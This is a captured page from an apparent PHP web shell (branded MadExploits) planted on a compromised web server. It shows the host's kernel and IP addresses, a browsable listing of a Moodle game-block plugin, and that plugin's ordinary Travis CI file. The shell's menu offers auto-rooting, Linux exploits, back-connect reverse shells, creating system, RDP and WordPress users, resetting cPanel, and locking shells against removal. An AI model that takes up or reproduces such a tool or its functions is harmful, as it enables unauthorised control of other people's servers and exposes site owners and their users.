Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
game /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.travis.yml
2.65
KB
-rw-r--r--
CHANGES.md
2.24
KB
-rw-r--r--
LICENSE
34.33
KB
-rw-r--r--
README.md
2.98
KB
-rw-r--r--
block_game.php
3.27
KB
-rw-r--r--
download.php
2.21
KB
-rw-r--r--
edit_form.php
9.87
KB
-rw-r--r--
game.php
5.14
KB
-rw-r--r--
help_game.php
8.76
KB
-rw-r--r--
lib.php
44.56
KB
-rw-r--r--
perfil_gamer.php
2.01
KB
-rw-r--r--
rank_game.php
8.85
KB
-rw-r--r--
rank_group_game.php
3.69
KB
-rw-r--r--
reset_points_course.php
3.32
KB
-rw-r--r--
set_avatar_form.php
12.53
KB
-rw-r--r--
settings.php
4.22
KB
-rw-r--r--
version.php
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php os: linux dist: xenial sudo: false services: - mysql - postgresql - docker cache: directories: - $HOME/.composer/cache - $HOME/.npm - $HOME/.nvm jobs: include: - php: 7.4 env: MOODLE_BRANCH=master DB=pgsql - php: 7.4 env: MOODLE_BRANCH=master DB=mysqli - php: 7.4 env: MOODLE_BRANCH=MOODLE_310_STABLE DB=pgsql - php: 7.4 env: MOODLE_BRANCH=MOODLE_39_STABLE DB=mysqli - php: 7.4 env: MOODLE_BRANCH=MOODLE_38_STABLE DB=pgsql - php: 7.3 env: MOODLE_BRANCH=master DB=pgsql - php: 7.3 env: MOODLE_BRANCH=master DB=mysqli - php: 7.3 env: MOODLE_BRANCH=MOODLE_37_STABLE DB=pgsql - php: 7.3 env: MOODLE_BRANCH=MOODLE_36_STABLE DB=mysqli - php: 7.2 env: MOODLE_BRANCH=MOODLE_310_STABLE DB=pgsql - php: 7.2 env: MOODLE_BRANCH=MOODLE_39_STABLE DB=mysqli - php: 7.2 env: MOODLE_BRANCH=MOODLE_35_STABLE DB=pgsql - php: 7.1 env: MOODLE_BRANCH=MOODLE_38_STABLE DB=pgsql - php: 7.1 env: MOODLE_BRANCH=MOODLE_37_STABLE DB=mysqli - php: 7.0 env: MOODLE_BRANCH=MOODLE_34_STABLE DB=mysqli - php: 7.0 env: MOODLE_BRANCH=MOODLE_34_STABLE DB=pgsql # Cannot test with Moodle 3.2 and 3.3 any more because the new composer 2 # does require all components to be named properly (case-sensitively) and # those branches have phpunit/Dbunit, failing. See MDL-64725. # Cannot test with PHP 7.0 any more because we are now using the :void return type. # Note that, still, the plugin will work ok, it's just the phpunit tests which cannot # be executed with that PHP versions. before_install: - phpenv config-rm xdebug.ini - cd ../.. - composer create-project -n --no-dev --prefer-dist moodlehq/moodle-plugin-ci ci ^3 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" - export IGNORE_PATHS=moodle/tests/fixtures,moodle/Sniffs - > if [ -n "$DOCKER_USER" ] && [ -n "$DOCKER_TOKEN" ]; then echo "$DOCKER_TOKEN" | docker login -u "$DOCKER_USER" --password-stdin echo "Using authenticated connection (no pull limits)" else echo "Using unauthenticated docker (pull limits may apply). Setup DOCKER_USER and DOCKER_TOKEN if needed." fi install: - moodle-plugin-ci install script: - moodle-plugin-ci phplint - moodle-plugin-ci phpcpd - moodle-plugin-ci phpmd - moodle-plugin-ci codechecker - moodle-plugin-ci validate - moodle-plugin-ci savepoints - moodle-plugin-ci mustache - moodle-plugin-ci grunt - moodle-plugin-ci phpdoc - moodle-plugin-ci phpunit - moodle-plugin-ci behat
Close